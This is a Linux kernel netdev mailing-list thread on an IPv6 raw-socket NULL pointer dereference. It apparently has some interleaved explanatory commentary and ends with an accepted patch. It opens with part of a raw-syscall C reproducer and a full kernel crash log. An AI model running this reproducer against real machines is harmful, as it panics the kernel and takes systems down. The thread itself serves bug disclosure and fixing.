	*(uint16_t*)0x20000040 = 0xa;
	*(uint16_t*)0x20000042 = htobe16(0);
	*(uint32_t*)0x20000044 = htobe32(0);
	*(uint8_t*)0x20000048 = -1;
	*(uint8_t*)0x20000049 = 2;
	memset((void*)0x2000004a, 0, 13);
	*(uint8_t*)0x20000057 = 1;
	*(uint32_t*)0x20000058 = 7;
	syscall(__NR_connect, r[3], 0x20000040ul, 0x1cul);
	*(uint32_t*)0x200000c0 = 0x910;
	syscall(__NR_setsockopt, r[3], 0x29, 7, 0x200000c0ul, 4ul);
	*(uint8_t*)0x20000f00 = 1;
	*(uint8_t*)0x20000f01 = 0x25;
	memset((void*)0x20000f02, 0, 6);
	*(uint8_t*)0x20000f08 = 0;
	*(uint8_t*)0x20000f09 = 0;
	*(uint8_t*)0x20000f0a = 7;
	*(uint8_t*)0x20000f0b = 0x28;
	*(uint32_t*)0x20000f0c = htobe32(3);
	*(uint8_t*)0x20000f10 = 8;
	*(uint8_t*)0x20000f11 = 0x3f;
	*(uint16_t*)0x20000f12 = 0xf735;
	*(uint64_t*)0x20000f14 = 7;
	*(uint64_t*)0x20000f1c = 0xfffffffeffffffff;
	*(uint64_t*)0x20000f24 = 3;
	*(uint64_t*)0x20000f2c = 0x1f;
	*(uint8_t*)0x20000f34 = 0xc9;
	*(uint8_t*)0x20000f35 = 0x10;
	*(uint8_t*)0x20000f36 = -1;
	*(uint8_t*)0x20000f37 = 1;
	memset((void*)0x20000f38, 0, 13);
	*(uint8_t*)0x20000f45 = 1;
	*(uint8_t*)0x20000f46 = 1;
	*(uint8_t*)0x20000f47 = 1;
	*(uint8_t*)0x20000f48 = 0;
	*(uint8_t*)0x20000f49 = 3;
	*(uint8_t*)0x20000f4a = 0xd6;
memcpy((void*)0x20000f4b, "\xf9\x32\x02\x55\x16\x7d\x27\xa7\x10\xb9\x5f\x81\x8f\xd7\x1b\x73\x48\x9c\xd9\x2f\xc3\x7f\x97\x0f\xee\xb1\x85\x97\xa5\x25\x71\xa2\x0b\xe3\x07\x28\x54\x44\xd9\x00\x36\xa4\xbf\xf0\x78\x15\x93\x9f\xe8\x90\x80\x4b\xd8\x6d\x60\x81\x6b\x85\xfa\xec\xf0\x44\x46\xe7\x2b\x58\xbd\x62\xcd\x28\x30\x64\x0c\xad\xaf\x33\x9d\x07\xb2\xd8\xe7\x61\x10\x5b\x3c\x32\x87\x22\x68\x0b\xee\xb4\xd8\xa3\x96\x77\xe2\xbb\xc1\xd6\x91\x03\x68\x07\x82\xe1\xd7\x9f\x95\x9e\x45\x96\x96\xb3\xfa\x62\xe5\xec\xda\x85\x69\xd8\x58\xc0\x7e\xbb\xe2\x3c\x96\xa8\xe6\x52\x7f\x24\xc5\xfd\xd7\xde\x46\xf0\xd9\x7e\x48\xe9\x5c\x84\x97\x11\x9e\x6c\xb0\xf2\xe2\xc5\xf5\xf7\x11\xcb\x46\x08\x72\xdc\xf8\x6f\xbd\x17\xc5\x8e\xeb\x83\x4d\x4b\x55\xbf\x6c\x69\xce\xf5\x53\xe3\x2b\x79\xc7\xdd\x56\x36\xd7\xa4\x0b\x1d\x1a\x1e\xf8\x58\x5d\x32\xd2\xb3\x69\xc7\x1a\x25\xf1\x75\x1a\x2c\x45\xd1\xcf\x12\xae\xce\x95\xaa", 214);
	*(uint8_t*)0x20001021 = 5;
	*(uint8_t*)0x20001022 = 0;
	*(uint8_t*)0x20001023 = 1;
	*(uint8_t*)0x20001024 = 1;
	*(uint8_t*)0x20001025 = 0;
	*(uint8_t*)0x20001026 = 5;
	*(uint8_t*)0x20001027 = 2;
	*(uint16_t*)0x20001028 = htobe16(1);
	*(uint8_t*)0x2000102a = 4;
	*(uint8_t*)0x2000102b = 1;
	*(uint8_t*)0x2000102c = 5;
	*(uint8_t*)0x2000102d = 5;
	*(uint8_t*)0x2000102e = 2;
	*(uint16_t*)0x2000102f = htobe16(4);
	syscall(__NR_setsockopt, r[3], 0x29, 0x3b, 0x20000f00ul, 0x138ul);
	syscall(__NR_splice, r[0], 0ul, r[2], 0ul, 0x804ffe2ul, 0ul);

}
int main(void)
{
	syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	do_sandbox_none();
	return 0;
}


* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:12   ` Kyle Zeng
  2023-01-06 23:57     ` Jakub Kicinski
@ 2023-01-09  8:45     ` Eric Dumazet
  2023-01-09 10:05       ` Herbert Xu
  1 sibling, 1 reply; 10+ messages in thread
From: Eric Dumazet @ 2023-01-09  8:45 UTC (permalink / raw)
  To: Kyle Zeng, Herbert Xu
  Cc: Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Sat, Jan 7, 2023 at 12:13 AM Kyle Zeng <zengyhkyle@gmail.com> wrote:
>
> Hi Jakub,
>
> The null dereference can happen if every iteration of the loop enters
> the `if (offset >= len) {` branch and hits `continue` without ever
> running `csum_skb = skb`.
> A crash report is attached to this email.

OK, but it seems we would be in an error condition, and would need to
purge sk_write_queue?

(i.e. call ip6_flush_pending_frames() and return some error instead of 0)

Also, please add:
Fixes: 357b40a18b04 ("[IPV6]: IPV6_CHECKSUM socket option can corrupt kernel memory")
Cc: Herbert Xu <herbert@gondor.apana.org.au>

>
> Best,
> Kyle Zeng
>
> =============================================
> [    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
> [    7.205204] #PF: supervisor read access in kernel mode
> [    7.206448] #PF: error_code(0x0000) - not-present page
> [    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
> [    7.208060] Oops: 0000 [#1] SMP NOPTI
> [    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39
> [    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.15.0-1 04/01/2014
> [    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
> 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
> 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
> 00 00
> [    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
> knlGS:0000000000000000
> [    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.216318] PKRU: 55555554
> [    7.216532] Call Trace:
> [    7.216744]  rawv6_sendmsg+0x72c/0x7d0
> [    7.217041]  kernel_sendmsg+0x7a/0x90
> [    7.217325]  sock_no_sendpage+0xc1/0xe0
> [    7.217644]  kernel_sendpage+0xa3/0xe0
> [    7.217945]  sock_sendpage+0x23/0x30
> [    7.218224]  pipe_to_sendpage+0x76/0xa0
> [    7.218529]  __splice_from_pipe+0xe5/0x200
> [    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
> [    7.219263]  generic_splice_sendpage+0x72/0xa0
> [    7.219650]  do_splice+0x4ad/0x780
> [    7.219928]  __se_sys_splice+0x162/0x210
> [    7.220231]  do_syscall_64+0x31/0x40
> [    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
> [    7.220944] RIP: 0033:0x47656d
> [    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e
> fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
> 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89
> 01 48
> [    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX:
> 0000000000000113
> [    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
> [    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
> [    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
> [    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
> [    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
> [    7.226112] Modules linked in:
> [    7.226350] CR2: 00000000000000b2
> [    7.226613] ---[ end trace 5d56aba11d09b665 ]---
> [    7.226993] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.227442] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
> 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
> 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
> 00 00
> [    7.228918] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.229322] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.229880] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.230516] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.231112] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.231687] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.232250] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
> knlGS:0000000000000000
> [    7.232912] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.233376] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.233958] PKRU: 55555554
> [    7.234170] Kernel panic - not syncing: Fatal exception
> [    7.234762] Kernel Offset: disabled
> [    7.235062] Rebooting in 1000 seconds..
>
> On Fri, Jan 6, 2023 at 3:55 PM Jakub Kicinski <kuba@kernel.org> wrote:
> >
> > On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> > > It is possible that the skb_queue_walk loop does not assign csum_skb to a real skb.
> >
> > Not immediately obvious to me how that could happen given prior checks
> > in this function.
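
The failure mode described in the quoted text above (every iteration of the
walk taking the `offset >= len` branch, so `csum_skb` is never assigned) can
be modelled in user space. This is only a sketch under stated assumptions:
`struct frag` and `find_csum_frag()` are hypothetical stand-ins invented for
illustration, not the kernel's `sk_buff` or the actual body of
rawv6_push_pending_frames().

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a queued fragment; not the kernel's sk_buff. */
struct frag {
	int payload_len; /* bytes available after the transport header */
};

/*
 * Walk the queue looking for the fragment that holds the checksum field.
 * Returns NULL when every fragment is skipped because the remaining
 * offset is at least as large as that fragment's payload.
 */
static const struct frag *find_csum_frag(const struct frag *q, size_t n,
					 int offset)
{
	const struct frag *csum_frag = NULL;
	size_t i;

	assert(q != NULL || n == 0);

	for (i = 0; i < n; i++) {
		if (csum_frag)
			continue; /* already found; nothing more to do */
		if (offset >= q[i].payload_len) {
			/* Field is not in this fragment: skip it. */
			offset -= q[i].payload_len;
			continue;
		}
		csum_frag = &q[i];
	}
	return csum_frag;
}
```

With two 100-byte fragments queued, an offset of 150 selects the second
fragment, while an offset of 250 skips both and the function returns NULL,
which is the value the caller would then go on to dereference.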


* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-09  8:45     ` Eric Dumazet
@ 2023-01-09 10:05       ` Herbert Xu
  2023-01-09 10:08         ` Eric Dumazet
  0 siblings, 1 reply; 10+ messages in thread
From: Herbert Xu @ 2023-01-09 10:05 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 09, 2023 at 09:45:14AM +0100, Eric Dumazet wrote:
> 
> OK, but it seems we would be in an error condition, and would need to
> purge sk_write_queue ?

No, the bug is elsewhere.  We already checked whether the offset
is valid at the top of the function:

	total_len = inet_sk(sk)->cork.base.length;
	if (offset >= total_len - 1) {
		err = -EINVAL;
		ip6_flush_pending_frames(sk);
		goto out;
	}

So we should figure out why the socket cork queue contains less
data than it claims.

Do we have a reproducer?

Thanks,
-- 
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt
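
The guard quoted in the message above only protects the later walk if
`total_len` matches the data that is really queued. A minimal user-space
sketch of that dependency follows; `csum_offset_rejected()` mirrors the
quoted comparison, while `guard_is_fooled()` and its `claimed_len` and
`queued_len` parameters are hypothetical names introduced here for
illustration.

```c
#include <assert.h>
#include <stdbool.h>

/*
 * Same comparison as the quoted check: the 2-byte checksum field
 * starting at `offset` must fit within `total_len` bytes.
 */
static bool csum_offset_rejected(int offset, int total_len)
{
	assert(offset >= 0 && total_len >= 0);
	return offset >= total_len - 1;
}

/*
 * Hypothetical helper: true when the guard accepts an offset based on
 * the claimed length even though the offset lies beyond the data that
 * is actually queued.
 */
static bool guard_is_fooled(int offset, int claimed_len, int queued_len)
{
	return !csum_offset_rejected(offset, claimed_len) &&
	       csum_offset_rejected(offset, queued_len);
}
```

For example, with a claimed length of 300 but only 200 bytes of checksummable
data, an offset of 250 passes the guard even though no queued fragment
contains it.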


* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-09 10:05       ` Herbert Xu
@ 2023-01-09 10:08         ` Eric Dumazet
  2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
  0 siblings, 1 reply; 10+ messages in thread
From: Eric Dumazet @ 2023-01-09 10:08 UTC (permalink / raw)
  To: Herbert Xu
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 9, 2023 at 11:05 AM Herbert Xu <herbert@gondor.apana.org.au> wrote:
>
> On Mon, Jan 09, 2023 at 09:45:14AM +0100, Eric Dumazet wrote:
> >
> > OK, but it seems we would be in an error condition, and would need to
> > purge sk_write_queue ?
>
> No, the bug is elsewhere.  We already checked whether the offset
> is valid at the top of the function:
>
>         total_len = inet_sk(sk)->cork.base.length;
>         if (offset >= total_len - 1) {
>                 err = -EINVAL;
>                 ip6_flush_pending_frames(sk);
>                 goto out;
>         }
>
> So we should figure out why the socket cork queue contains less
> data than it claims.
>
> Do we have a reproducer?

Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/

Thanks.

>
> Thanks,
> --
> Email: Herbert Xu <herbert@gondor.apana.org.au>
> Home Page: http://gondor.apana.org.au/~herbert/
> PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt


* [PATCH] ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
  2023-01-09 10:08         ` Eric Dumazet
@ 2023-01-10  0:59           ` Herbert Xu
  2023-01-11 12:50             ` patchwork-bot+netdevbpf
  0 siblings, 1 reply; 10+ messages in thread
From: Herbert Xu @ 2023-01-10  0:59 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 09, 2023 at 11:08:08AM +0100, Eric Dumazet wrote:
>
> Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/

Thanks for the link!

It looks like I didn't think about extension headers in the original
patch.

---8<---
The total cork length created by ip6_append_data includes extension
headers, so we must exclude them when comparing the length against the
IPV6_CHECKSUM offset, which does not include extension headers.

Reported-by: Kyle Zeng <zengyhkyle@gmail.com>
Fixes: 357b40a18b04 ("[IPV6]: IPV6_CHECKSUM socket option can corrupt kernel memory")
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
index c51d5ce3711c..c68020b8de89 100644
--- a/net/ipv6/raw.c
+++ b/net/ipv6/raw.c
@@ -539,6 +539,7 @@ static int rawv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
 static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 				     struct raw6_sock *rp)
 {
+	struct ipv6_txoptions *opt;
 	struct sk_buff *skb;
 	int err = 0;
 	int offset;
@@ -556,6 +557,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 
 	offset = rp->offset;
 	total_len = inet_sk(sk)->cork.base.length;
+	opt = inet6_sk(sk)->cork.opt;
+	total_len -= opt ? opt->opt_flen : 0;
+
 	if (offset >= total_len - 1) {
 		err = -EINVAL;
 		ip6_flush_pending_frames(sk);
-- 
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt
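
The effect of the length adjustment in the patch above can be illustrated
outside the kernel. This is a hedged sketch, not the kernel code:
`struct txoptions_model`, `payload_len()` and `check_offset()` are
hypothetical names, and only the `opt ? opt->opt_flen : 0` deduction and the
`offset >= total_len - 1` comparison are taken from the diff.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical stand-in carrying only the field the patch reads. */
struct txoptions_model {
	int opt_flen; /* extension header bytes that the patch deducts */
};

/* Cork length minus extension headers; opt may be NULL, as in the patch. */
static int payload_len(int cork_len, const struct txoptions_model *opt)
{
	int total_len = cork_len;

	assert(cork_len >= 0);
	total_len -= opt ? opt->opt_flen : 0;
	return total_len;
}

/* Returns 0 when the checksum offset is acceptable, -EINVAL otherwise. */
static int check_offset(int offset, int cork_len,
			const struct txoptions_model *opt)
{
	int total_len = payload_len(cork_len, opt);

	if (offset >= total_len - 1)
		return -EINVAL;
	return 0;
}
```

With a cork length of 300 and 100 bytes of extension headers, an offset of
250 is accepted when the headers are ignored (opt == NULL in this model) and
rejected with -EINVAL once they are deducted, so the walk never runs with an
offset that no fragment can satisfy.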


* Re: [PATCH] ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
  2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
@ 2023-01-11 12:50             ` patchwork-bot+netdevbpf
  0 siblings, 0 replies; 10+ messages in thread
From: patchwork-bot+netdevbpf @ 2023-01-11 12:50 UTC (permalink / raw)
  To: Herbert Xu
  Cc: edumazet, zengyhkyle, kuba, davem, yoshfuji, dsahern, pabeni, netdev

Hello:

This patch was applied to netdev/net.git (master)
by David S. Miller <davem@davemloft.net>:

On Tue, 10 Jan 2023 08:59:06 +0800 you wrote:
> On Mon, Jan 09, 2023 at 11:08:08AM +0100, Eric Dumazet wrote:
> >
> > Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/
> 
> Thanks for the link!
> 
> It looks like I didn't think about extension headers in the original
> patch.
> 
> [...]

Here is the summary with links:
  - ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
    https://git.kernel.org/netdev/net/c/cb3e9864cdbe

You are awesome, thank you!
-- 
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html





Thread overview: 10+ messages
2023-01-06 21:19 net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames Kyle Zeng
2023-01-06 22:55 ` Jakub Kicinski
2023-01-06 23:12   ` Kyle Zeng
2023-01-06 23:57     ` Jakub Kicinski
2023-01-08 22:09       ` Kyle Zeng
2023-01-09  8:45     ` Eric Dumazet
2023-01-09 10:05       ` Herbert Xu
2023-01-09 10:08         ` Eric Dumazet
2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
2023-01-11 12:50             ` patchwork-bot+netdevbpf
